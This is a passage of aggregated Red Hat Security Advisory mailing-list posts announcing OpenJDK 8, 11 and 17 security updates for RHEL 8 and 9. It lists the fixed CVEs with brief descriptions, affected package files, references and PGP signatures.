java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsZtzjgjWX9erEAQjIog//ebXxDiQwT38w8Q9LZ/SpPJAkiRtem4YN  
akzFrJxBC/yYHauhryMnzbbxBcXgoVxoIoG8Wb6klzH2ZVrUQ+UVE8eQHiVTULuY  
BTbt05SHXDIHKONHr9+007UzM9+ajrOQxpM643ufOrYAXFbb3l5Q+wWgXq76bywr  
LsFGetcdxCaVj4TWNIH9kBPzQ1uoujQLzHZmRHTfQARm2T7vbJQW7VlwKCZKPlhT  
sasMQkXGFIXNoU9io0M0t7UXUZW3/tN+Ygu3DH4H+HxBswwX2/MLIDkAhnG9ApX4  
oEe6JG3zZvXhYfYlxFxdceoGmid237Pli9kBeH2oWBTpsB3Xdx7ZKO+fbnd7nmoC  
Py6uViGGxzgwnkyzkz/YyWUJEZ+Cwbck/aMdxolIQOoGkxqvjFFOc+32fyoiAee/  
vMdN8CNLknxeemb+CLcPRstmu80KVf85/xQcE9NWo01nVajWu4PNMYLlSN/NgE9Z  
8PnR9auHv12EIk2VBGaYq3lvQQHfQx4ROprFMvIITBdzb+cwqzU0EtYMU+S1cZ2U  
z6NUVWOUxFTcM6k2PUM62npQZbPMjg5Z725y0/ZlbwmMjVrH1bDrUPlVHLWAbV99  
5bmP6hdChs9soubSxc8ymexQToyvt920wXM5GVyZkhh35xZ5HtNyLt8FxswMPyI1  
A+4SEiM+K/E=  
=eGfu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1900-01

Red Hat Security Advisory 2023-1909-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1909-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1909  
Issue date:        2023-04-25  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The RSAPSSSignature implementation works with RSA keys via the SunRSASign  
provider. However, it did not fully check that the RSA key could be used by  
the provider before attempting to do so, leading to the possibility of  
errors being returned with custom security providers. The implementation  
now validates RSA keys and will allow other providers to handle such keys  
where it cannot. (RHBZ#2188024)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)  
2188024 - Backport JDK-8271199 [rhel-9.1.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.el9_1.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.el9_1.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsNdzjgjWX9erEAQjwCw//ZVoLIV4we9R01XluXp+xN21yeLGMJpKA  
z6oWHWYtL/uthwAkk0BzLYzlsqUxcetZv4HebsWHPiAlXomkYoC0UI5gkfxWtlle  
n1pxUEqqgIEmSkut9bfqX4w9HeIo3Uaneys+FeBw8IYCMqnF7EOji30LoLIcjPyr  
nJK4SukS2bq2rrY3afM3UQyipHfGkrc9EhHfBftPFsHCeTmjzRngjqPYY6hL7mOh  
E2c/ihSdA9KMlWrG4p/x8XquMiaZC/IjLb7MC9C6Ul8s54oNhl7PWncf2ADj8Xgn  
86SR//4vzTkLnyRX240CtZqwF08nZIkwpO6l+Nx1zquJ9UfZ+p/EU0NG2h/JUyAI  
tB0Tsm3RETcQ95YgfAW6nFe4aUgt1eJCbt6UNqTZIqraC8vcHDXyzExsUtDK+9Gm  
wa7TkeVBef16EXysSXebCzO8kJox1HN20mrfe+j9W2XhW6DJtYjJ5rm9rkrujNRH  
Nmq2/0B9bvTOdoeOIgGgNRVZW6gICvshkYzLTGxezKzlOqm2CzzYC1jRBEsDkjvt  
HLyfhRiaBe2AuCYWdNBkCsLz8+j9MHYEowPcNOL42s27ssyjuRFyZ0FeBHOJLz/S  
PgjdsDaCr8NoMp0D++QWQD4/Ng25r7sEING6MIELIVF1BZfLLPWEyWrdVsBlCUjG  
HbewqKQd4Cg=  
=QPaK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1909-01

Red Hat Security Advisory 2023-1895-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1895-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1895  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-11-openjdk-11.0.19.0.7-1.el8_7.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
